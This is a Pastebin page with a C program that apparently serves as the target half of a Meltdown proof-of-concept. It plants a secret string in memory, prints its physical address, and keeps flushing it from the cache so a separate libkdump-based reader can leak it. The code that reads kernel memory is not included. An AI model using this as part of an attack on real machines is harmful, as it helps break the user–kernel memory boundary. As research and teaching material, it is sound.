Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #include "libkdump.h"
- #include <sched.h>
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <time.h>
- #include <x86intrin.h>
- #include <sys/mman.h>
- const char *strings[] = {
- "If you can read this, this is really bad",
- "Burn after reading this string, it is a secret string",
- "Congratulations, you just spied on an application",
- "Wow, you broke the security boundary between user space and kernel",
- "Welcome to the wonderful world of microarchitectural attacks",
- "Please wait while we steal your secrets...",
- "Don't panic... But your CPU is broken and your data is not safe",
- "How can you read this? You should not read this!"};
- int main(int argc, char *argv[]) {
- libkdump_config_t config;
- config = libkdump_get_autoconfig();
- libkdump_init(config);
- srand(time(NULL));
- const char *orig_secret = strings[rand() % (sizeof(strings) / sizeof(strings[0]))];
- void *block = malloc(1024 * 1024 * 1024);
- int *junk;
- for (junk = (int*)block; junk < ((char*)block + (1024 * 1024 * 1024)); junk++) {
- *junk = 0x402A402A;
- }
- char *secret = (char*)block + (32 * 1024 * 1024);
- strcpy(secret, orig_secret);
- int len = strlen(secret);
- printf("\x1b[32;1m[+]\x1b[0m Secret: \x1b[33;1m%s\x1b[0m\n", secret);
- size_t paddr = libkdump_virt_to_phys((size_t)secret);
- if (!paddr) {
- printf("\x1b[31;1m[!]\x1b[0m Program requires root privileges (or read access to /proc/<pid>/pagemap)!\n");
- libkdump_cleanup();
- exit(1);
- }
- printf("\x1b[32;1m[+]\x1b[0m Physical address of secret: \x1b[32;1m0x%zx\x1b[0m\n", paddr);
- printf("\x1b[32;1m[+]\x1b[0m Exit with \x1b[37;1mCtrl+C\x1b[0m if you are done reading the secret\n");
- while(1) {
- char *cur;
- for (cur = secret; cur < secret + len; cur++) {
- _mm_clflush(cur);
- }
- }
- return 0;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
